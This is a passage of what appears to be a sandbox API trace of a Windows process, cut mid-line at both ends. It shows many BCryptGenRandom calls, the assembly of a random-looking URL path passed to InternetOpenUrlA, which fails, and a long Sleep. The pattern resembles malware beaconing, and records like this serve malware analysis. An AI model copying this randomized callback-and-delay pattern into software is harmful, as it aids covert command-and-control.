(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a168a1, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a168a1) returned 0x0 [0176.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a168b7, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a168b7) returned 0x0 [0176.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a168c8, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a168c8) returned 0x0 [0176.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.257] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.257] GetProcessHeap () returned 0x440000 [0176.257] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0176.257] lstrcpyA (in: lpString1=0x473140, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0176.258] lstrcatA (in: lpString1="\x81\x03", lpString2="/mslf1pmr17co6400amqnq/rnJboayo7kssvgD7/56rrn1m6boU7bk6ltmkaZlJ71v12lCl9e6awgdoOf3w/" | out: lpString1="\x81\x03/mslf1pmr17co6400amqnq/rnJboayo7kssvgD7/56rrn1m6boU7bk6ltmkaZlJ71v12lCl9e6awgdoOf3w/") returned="\x81\x03/mslf1pmr17co6400amqnq/rnJboayo7kssvgD7/56rrn1m6boU7bk6ltmkaZlJ71v12lCl9e6awgdoOf3w/" [0176.258] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0176.258] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/mslf1pmr17co6400amqnq/rnJboayo7kssvgD7/56rrn1m6boU7bk6ltmkaZlJ71v12lCl9e6awgdoOf3w/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0176.258] GetProcessHeap () returned 0x440000 [0176.258] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0176.258] GetProcessHeap () returned 0x440000 [0176.258] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a168a0 | out: hHeap=0x440000) returned 1 [0176.258] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0176.259] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0176.259] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0176.259] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0176.259] Sleep (dwMilliseconds=0x11d00) [0176.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0176.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.434] GetProcessHeap () returned 0x440000 [0176.434] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02050 [0176.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02051, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a02051) returned 0x0 [0176.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, 